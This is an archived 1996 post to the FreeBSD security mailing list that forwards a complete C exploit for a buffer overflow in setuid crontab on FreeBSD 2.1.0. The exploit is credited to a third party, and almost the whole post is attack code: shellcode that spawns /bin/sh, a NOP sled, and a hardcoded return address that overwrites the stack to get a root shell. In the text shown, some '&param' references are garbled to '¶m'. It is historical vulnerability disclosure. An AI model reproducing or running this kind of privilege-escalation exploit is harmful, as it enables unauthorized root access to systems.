Date: Mon, 16 Dec 1996 13:04:33 +0300 (MSK) From: Dmitry Valdov <dv@kis.ru> To: freebsd-security@freebsd.org Subject: crontab security hole exploit Message-ID: <Pine.FBSD.3.95.961216130323.14404A-100000@xkis.kis.ru>
next in thread | raw e-mail | index | archive | help
Hello!
Exploit for buffer overflow in crontab.
/* ---------------------------- CUT HERE ----------------------------------- */
/* */
/* Hi ! */
/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */
/* If you have any problems with it, drop me a letter. */
/* Have fun ! */
/* */
/* */
/* ---------------------- */
/* --------------------------------------------- */
/* ----------------- Dedicated to my beautiful lady ------------------ */
/* --------------------------------------------- */
/* ---------------------- */
/* */
/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */
#include <stdio.h>
main()
{
#define length 353
int i,j;
unsigned long start_addr;
char *env[]={NULL};
char param_string[length];
char code_string[]=
{
"\xeb\x2a" /* jmp cont */
/* geteip: */ "\x5d" /* popl %ebp */
"\x55" /* pushl %ebp */
"\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */
"\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */
"\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */
"\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */
"\xff\x45\xef" /* incl 0xffffffef(%ebp) */
"\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */
"\xc3" /* ret */
/* 0xffffffe0(%ebp): */ "/bin/sh"
/* 0xffffffe7(%ebp): */ "\x01"
/* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */
"\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */
/* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */
"\xe8\xcb\xff\xff\xff" /* call geteip */
"\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */
"\x55" /* pushl %ebp */
"\x55" /* pushl %ebp */
"\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */
"\x55" /* pushl %ebp */
"\xe8\xd4\xff\xff\xff" /* call execve */
};
for(i=0;i<length-1;param_string[i++]='\x90'); param_string[length-1]='\0';
start_addr=0xefbfddf0;
*( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
strncpy(¶m_string[200],code_string,strlen(code_string));
*( (unsigned long*) ¶m_string[348])= start_addr;
execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);
}
Dmitry.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.FBSD.3.95.961216130323.14404A-100000>